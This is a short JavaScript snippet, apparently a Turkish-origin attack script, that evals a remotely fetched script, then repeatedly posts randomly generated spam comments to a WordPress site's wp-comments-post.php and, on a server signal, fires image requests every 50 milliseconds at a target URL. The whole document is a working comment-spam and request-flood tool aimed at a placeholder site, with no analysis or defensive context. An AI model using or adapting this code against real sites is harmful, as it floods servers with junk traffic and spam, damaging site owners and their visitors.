İlginiz İçin Teşekkürler.
function include(method, url) {
var xmlhttp = new XMLHttpRequest();
xmlhttp.open(method, url);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4) {
eval(xmlhttp.responseText);
}
};
xmlhttp.send();
}
include("GET", "https://code.jquery.com/jquery-2.1.4.min.js");
function rastgele(uzunluk) { mtn = "ABCDEFGHIJKLMNOPRSTUVYZXabcdefghijklmnoprstuvyzx0123456789";
ret = "";
for (i = 0; i < uzunluk; i++) {
ret += mtn[Math.floor(Math.random() * 57)];
}
return ret;
}
s4coderid=rastgele(10);
setInterval("main()",10111);
function main(){
$.ajax({
url: "http://www.siteadi.com/wp-comments-post.php",
data: {
'author': rastgele(10),
'email': rastgele(10)+"@gmail.com",
'url': rastgele(10),
'comment': rastgele(10),
'submit': "Leave a Reply",
'comment_post_ID': "401",
'comment_post_ID': "401",
'comment_parent': "1",
},
type: "POST",
success: function(resp) {
function flood(){
var img = new Image();
img.src = resp.target;
img.onload;
}
if(resp.status == "1"){
var floodInterval = setInterval("flood()",50);
} else {
var floodInterval = setInterval("flood()",9999999999999);
clearInterval(floodInterval);
}
},
error : function(jqXHR, textStatus, errorThrown) {},
timeout: 120000,
});
}